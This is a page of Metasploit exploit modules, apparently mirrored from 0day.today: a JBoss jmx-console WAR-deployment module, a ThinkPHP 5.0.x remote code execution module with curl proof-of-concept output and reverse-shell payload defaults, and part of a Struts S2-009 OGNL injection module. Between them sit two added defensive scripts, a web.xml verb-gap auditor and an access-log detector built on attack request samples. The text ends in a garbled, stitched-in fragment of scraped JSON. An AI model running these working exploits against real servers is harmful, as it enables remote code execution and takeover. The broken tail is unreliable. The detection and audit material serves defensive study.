        OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
        OptString.new('SHELL',    [ false, 'The system shell to use', 'automatic' ]),
        OptString.new('JSP',      [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
        OptString.new('APPBASE',  [ false, 'Application base name, (default: random)', nil ]),
        OptString.new('PATH',     [ true,  'The URI path of the JMX console', '/jmx-console' ]),
        OptString.new('VERB',     [ true,  'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
      ], self.class)
  end


  def exploit
    datastore['BasicAuthUser'] = datastore['USERNAME']
    datastore['BasicAuthPass'] = datastore['PASSWORD']

    jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
    app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))

    # Anything other than GET/POST is sent as HEAD: the console's security
    # constraint only covered those two verbs (CVE-2010-0738).
    verb = datastore['VERB']
    if (verb != 'GET' and verb != 'POST')
      verb = 'HEAD'
    end

    p = payload
    if datastore['SHELL'] == 'automatic'
      if not (plat = detect_platform())
        raise RuntimeError, 'Unable to detect platform!'
      end

      case plat
      when 'linux'
        datastore['SHELL'] = '/bin/sh'
      when 'win'
        datastore['SHELL'] = 'cmd.exe'
      end

      print_status("SHELL set to #{datastore['SHELL']}")

      # Payload generation already happened, therefore SHELL will
      # already be 'automatic' in the payload regardless of what we set above.
      # To fix this, we regenerate the payload now..
      return if ((p = regenerate_payload(platform, target_arch)) == nil)
    end

    # The following Beanshell script will write the exploded WAR file to the deploy/
    # directory
    encoded_payload = [p.encoded].pack('m').gsub(/\n/, '')
    bsh_script = <<-EOT
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "#{encoded_payload}";

BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/#{app_base + '.war'}").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String jsp_file = jboss_home + "/deploy/#{app_base + '.war/' + jsp_name + '.jsp'}";
FileOutputStream fstream = new FileOutputStream(jsp_file);
fstream.write(byteval);
fstream.close();
    EOT

    #
    # UPLOAD
    #
    print_status("Creating exploded WAR in deploy/#{app_base}.war/ dir via BSHDeployer")
    res = invoke_bshscript(bsh_script, verb)
    if !res
      raise RuntimeError, "Unable to deploy WAR [No Response]"
    end
    if (res.code < 200 || res.code >= 300)
      case res.code
      when 401
        print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
      end
      raise RuntimeError, "Upload to deploy WAR [#{res.code} #{res.message}]"
    end

    #
    # EXECUTE
    #
    uri = '/' + app_base + '/' + jsp_name + '.jsp'
    print_status("Executing #{uri}...")

    # JBoss might need some time for the deployment. Try 5 times at most and
    # wait 3 seconds inbetween tries
    num_attempts = 5
    num_attempts.times { |attempt|
      res = send_request_cgi({
        'uri'    => uri,
        'method' => verb
      }, 20)

      msg = nil
      if (! res)
        msg = "Execution failed on #{uri} [No Response]"
      elsif (res.code < 200 or res.code >= 300)
        msg = "Execution failed on #{uri} [#{res.code} #{res.message}]"
      elsif (res.code == 200)
        print_good("Successfully triggered payload at '#{uri}'")
        break
      end

      if (attempt < num_attempts - 1)
        msg << ", retrying in 3 seconds..."
        print_error(msg)

        select(nil, nil, nil, 3)
      else
        print_error(msg)
      end
    }

    #
    # DELETE
    #
    # The WAR can only be removed by physically deleting it, otherwise it
    # will get redeployed after a server restart.
    bsh_script = <<-EOT
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/#{app_base + '.war/' + jsp_name + '.jsp'}").delete();
new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
    EOT

    print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
    res = invoke_bshscript(bsh_script, verb)
    if !res
      print_error("WARNING: Unable to remove WAR [No Response]")
    elsif (res.code < 200 || res.code >= 300)
      print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
    end

    handler
  end

  # Try to autodetect the target platform
  def detect_platform()
    print_status("Attempting to automatically detect the platform...")

    path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
    res = send_request_raw(
      {
        'uri' => path
      }, 20)

    if (not res) or (res.code != 200)
      print_error("Failed: Error requesting #{path}")
      return nil
    end

    if (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\/td>/m)
      os = $1
      if (os =~ /Linux/i)
        return 'linux'
      elsif (os =~ /Windows/i)
        return 'win'
      end
    end
    nil
  end


  # Invokes +bsh_script+ on the JBoss AS via BSHDeployer
  def invoke_bshscript(bsh_script, verb)
    params =  'action=invokeOpByName'
    params << '&name=jboss.deployer:service=BSHDeployer'
    params << '&methodName=createScriptDeployment'
    params << '&argType=java.lang.String'
    params << '&arg0=' + Rex::Text.uri_encode(bsh_script)
    params << '&argType=java.lang.String'
    params << '&arg1=' + rand_text_alphanumeric(8+rand(8)) + '.bsh'

    if (verb == "POST")
      res = send_request_cgi({
        'method' => verb,
        'uri'    => datastore['PATH'] + '/HtmlAdaptor',
        'data'   => params
      })
    else
      res = send_request_cgi({
        'method' => verb,
        'uri'    => datastore['PATH'] + '/HtmlAdaptor?' + params
      })
    end
    res
  end
end
```

### ThinkPHP 5.0.23 Remote Code Execution Exploit

* Source: 0day.today, 1337DAY-ID-34238, published 2020-04-15
* CVE: CVE-2018-20062, CVE-2019-9082
* CVSS v3.0: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
* https://0day.today/exploit/description/34238
* Download: https://0day.today/exploit/34238

This Metasploit module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
      'Description' => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
      'Author' => [
        # Discovery by unknown threaty threat actors
        'wvu' # Module
      ],
      'References' => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
      'DisclosureDate' => '2018-12-10', # Unknown discovery date
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' => [
        ['Unix Command',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_cmd,
          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :linux_dropper,
          'DefaultOptions' => {
            'CMDSTAGER::FLAVOR' => :curl,
            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
      'DefaultTarget' => 1,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_I N_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
  wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=1353 HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 404 Not Found
  < Date: Mon, 13 Apr 2020 06:42:15 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Content-Length: 7332
  < Content-Type: text/html; charset=utf-8
  <
  { [7332 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
        'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
        'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
  wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:43:45 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        's' => '/Index/\\think\\app/invokefunction',
        'function' => 'call_user_func_array',
        'vars[0]' => 'system', # TODO: Debug ARCH_PHP
        'vars[1][]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
  wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
  > POST /index.php?s=captcha HTTP/1.1
  > Host: 127.0.0.1:8081
  > User-Agent: curl/7.54.0
  > Accept: */*
  > Content-Length: 72
  > Content-Type: application/x-www-form-urlencoded
  >
  } [72 bytes data]
  * upload completely sent off: 72 out of 72 bytes
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:44:05 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.12
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => 'captcha'},
      'vars_post' => {
        '_method' => '__construct',
        'filter[]' => 'system', # TODO: Debug ARCH_PHP
        'method' => 'get',
        'server[REQUEST_METHOD]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end
```
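Both JBoss listings above reach the jmx-console's `HtmlAdaptor` without credentials because the console's original `web.xml` security-constraint enumerated only GET and POST; that is why the Beanshell deployer module falls back to `VERB=HEAD` and why Packet Storm files both records under CVE-2010-0738. The audit script below is an added example written for this page, not code from Vulmap, Metasploit or the exploit authors. It parses a servlet `web.xml`, flags every authenticated constraint that lists `<http-method>` elements, and reports which verbs are left unprotected. The two XML documents in it are constructed samples that imitate the shape of the shipped jmx-console descriptor and of its fix (dropping the method list so the constraint covers every verb); they are not copied from any JBoss release.

```python
"""Audit a servlet web.xml for HTTP-verb gaps in its security constraints.

Added example for this page (not JBoss, Metasploit or Vulmap code). A
<security-constraint> whose <web-resource-collection> enumerates
<http-method> elements protects ONLY those verbs; any other verb (HEAD,
DELETE, ...) reaches the servlet without authentication. That gap in the
jmx-console descriptor is CVE-2010-0738.
"""
import xml.etree.ElementTree as ET

# Verbs worth checking; any of these that is not enumerated is unprotected.
ALL_VERBS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"}

# Constructed sample shaped like the jmx-console web.xml that shipped with the
# vulnerable versions: only GET and POST are constrained.
VULNERABLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""

# Constructed sample of the fix: no <http-method> list, so the constraint
# applies to every verb.
FIXED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Strip the namespace from an ElementTree tag ('{ns}name' -> 'name')."""
    return tag.rsplit("}", 1)[-1]


def audit_web_xml(xml_text):
    """Return [(url_pattern, [unprotected verbs])] for every authenticated
    constraint that enumerates http-methods. An empty list means no gap."""
    root = ET.fromstring(xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        # Without an <auth-constraint> nothing is protected anyway, so there
        # is no verb gap to report.
        if not any(_local(c.tag) == "auth-constraint" for c in sc):
            continue
        for wrc in sc:
            if _local(wrc.tag) != "web-resource-collection":
                continue
            methods = {m.text.strip().upper() for m in wrc
                       if _local(m.tag) == "http-method" and m.text}
            patterns = [p.text.strip() for p in wrc
                        if _local(p.tag) == "url-pattern" and p.text]
            if not methods:
                continue  # no list: the constraint covers all verbs
            gap = sorted(ALL_VERBS - methods)
            for pattern in patterns:
                findings.append((pattern, gap))
    return findings


def bypass_verb(xml_text, path="/*"):
    """A verb an unauthenticated client could use against `path`, or None.
    HEAD is preferred because it is what the Metasploit module sends."""
    for pattern, gap in audit_web_xml(xml_text):
        if pattern == path and gap:
            return "HEAD" if "HEAD" in gap else gap[0]
    return None


if __name__ == "__main__":
    for name, doc in (("vulnerable", VULNERABLE_WEB_XML), ("fixed", FIXED_WEB_XML)):
        print(name, audit_web_xml(doc) or "no verb gap")
```

Run it against a real `jmx-console.war/WEB-INF/web.xml` by reading the file into `audit_web_xml`; an empty result means every verb is behind the `JBossAdmin` role. Servlet 3.0 containers can also express "all verbs except these" with `<http-method-omission>`, which this check treats the same way as no list at all.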
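On the defensive side, the request shapes in the modules collected here (the jmx-console `HtmlAdaptor` invocations against `DeploymentScanner` and `BSHDeployer`, the ThinkPHP `\think\app/invokefunction` route, and the Struts S2-009 OGNL expression that the module further down builds into the query string) are all visible in a web server access log whenever they travel in the URL. The detector below is an added example, not part of Vulmap or of any of the modules; its log lines are constructed in Apache common log format from the requests those modules issue, and the indicator names are labels chosen for this example. It also encodes a caveat: the addURL POST of the Perl exploit and the ThinkPHP 5.0.23 `_method=__construct` POST carry their indicators in the request body, so an access log shows only a bare `POST /jmx-console/HtmlAdaptor` or `POST /index.php?s=captcha`; catching those needs request-body logging or host-side artifacts such as new files under `deploy/`.

```python
"""Flag access-log requests matching the exploitation patterns on this page.

Added example (not Vulmap or Metasploit code). The sample lines are
constructed in Apache common log format from the requests the JBoss,
ThinkPHP and Struts modules send; indicator names are labels chosen here.
"""
import re
from urllib.parse import unquote_plus

# ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = [
    # ThinkPHP < 5.0.23: routed call to think\app::invokefunction
    '10.0.0.5 - - [13/Apr/2020:06:43:45 +0000] "GET /index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 60',
    # JBoss: the Perl exploit inspecting the DeploymentScanner MBean for method indexes
    '10.0.0.7 - - [03/Oct/2011:10:02:10 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Aflavor%3DURL%2Ctype%3DDeploymentScanner HTTP/1.1" 200 9876',
    # JBoss: addURL invoked by POST; the operation name is in the body, not the log
    '10.0.0.7 - - [03/Oct/2011:10:02:11 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1337',
    # JBoss: BSHDeployer script via HEAD (CVE-2010-0738 verb tampering)
    '10.0.0.8 - - [24/Jun/2010:09:15:00 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=import+java.io.FileOutputStream%3B HTTP/1.1" 200 -',
    # Struts S2-009: OGNL smuggled through a parameter name/value pair
    '10.0.0.9 - - [01/Oct/2011:12:00:00 +0000] "GET /blank-struts2/login.action?username=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D%2Bnew%2Bjava.lang.Boolean(true),%40java.lang.Runtime%40getRuntime().exec(%27id%27))(%27meh%27)&z%5B(username)(meh)%5D=true HTTP/1.1" 200 512',
    # Benign: the ThinkPHP version check hits an unknown route and gets a 404
    '10.0.0.2 - - [13/Apr/2020:06:42:15 +0000] "GET /index.php?s=1353 HTTP/1.1" 404 7332',
    # Benign: console index, authentication demanded
    '10.0.0.3 - - [01/Oct/2011:12:01:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 0',
]


def classify_request(method, target):
    """Return the sorted list of indicator names for one request line."""
    path, _, query = target.partition("?")
    low = unquote_plus(query).lower()  # decode %xx and '+' before matching
    hits = set()

    if path.endswith("/jmx-console/HtmlAdaptor"):
        # Any MBean operation through the console is worth a look on its own.
        hits.add("jboss-jmx-console-htmladaptor")
        if "type=deploymentscanner" in low:
            hits.add("jboss-deploymentscanner-mbean")
        if "service=bshdeployer" in low and "createscriptdeployment" in low:
            hits.add("jboss-bshdeployer-script")
        if method not in ("GET", "POST"):
            # The original constraint listed only GET and POST; any other verb
            # means the request went around the console's authentication.
            hits.add("cve-2010-0738-verb-tampering")

    # '\think\app/invokefunction' once %5C is decoded (ThinkPHP < 5.0.23)
    if "\\think\\app/invokefunction" in low:
        hits.add("thinkphp-invokefunction-rce")

    # OGNL context / member-access manipulation in a Struts parameter
    if "#_memberaccess" in low or "xwork.methodaccessor.denymethodexecution" in low:
        hits.add("struts-ognl-injection")

    return sorted(hits)


def scan_log(lines):
    """Return [(ip, method, indicators)] for every parsable line with a hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["method"], m["target"])
        if hits:
            findings.append((m["ip"], m["method"], hits))
    return findings


if __name__ == "__main__":
    for ip, method, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:<10} {method:<5} {', '.join(hits)}")
```

Feed it real lines with `scan_log(open(path))`. The `jboss-jmx-console-htmladaptor` tag on its own is low confidence (an administrator uses the same servlet); the verb-tampering and script-deployment tags are the ones worth paging on.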
### Apache Struts ParametersInterceptor Remote Code Execution

* Source: 0day.today, 1337DAY-ID-20544, published 2013-03-22
* CVE: CVE-2011-3923 (S2-009)
* https://0day.today/exploit/description/20544

This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions before 2.3.1.2. The ParametersInterceptor allows parentheses in parameter names, which lets it interpret parameter values as OGNL expressions during the exception handling for mismatched property data types; a remote attacker can use a crafted parameter to execute arbitrary Java code.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
        for the use of parentheses which in turn allows it to interpret parameter values as
        OGNL expressions during certain exception handling for mismatched data types of
        properties which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
          'mihi' #ARCH_JAVA support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3923'],
          [ 'OSVDB', '78501'],
          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
        ],
      'Platform'       => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'windows'
            }
          ],
          ['Linux Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'Oct 01 2011',
      'DefaultTarget'  => 2))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
        OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
        OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
      ], self.class)
  end

  def execute_command(cmd, opts = {})
    # The parameter name carries the OGNL: disable the method-execution guard,
    # allow static method access, then evaluate CMD.
    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
    uri = String.new(datastore['TARGETURI'])
    uri = normalize_uri(uri)
    uri.gsub!(/INJECT/,inject) # append the injection string
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    })
    return resp #Used for check function.
  end

  def exploit
    #Set up generic values.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    append = 'false'
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target
    # (the listing ends here; the remainder of the module is not on this page)
```
platform!')\r\n end\r\n\r\n #Now with all the arch specific stuff set, perform the upload.\r\n #109 = length of command string plus the max length of append.\r\n sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length\r\n chunk_length = 2048 - sub_from_chunk\r\n chunk_length = ((chunk_length/4).floor)*3\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"\"\r\n cmd << \"#f=new java.io.FileOutputStream('#(unknown)',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@[email\u00a0protected](#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/20544", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-06T00:18:44", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-03-04T00:00:00", "type": "zdt", "title": "zzzphp CMS 1.6.1 - Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
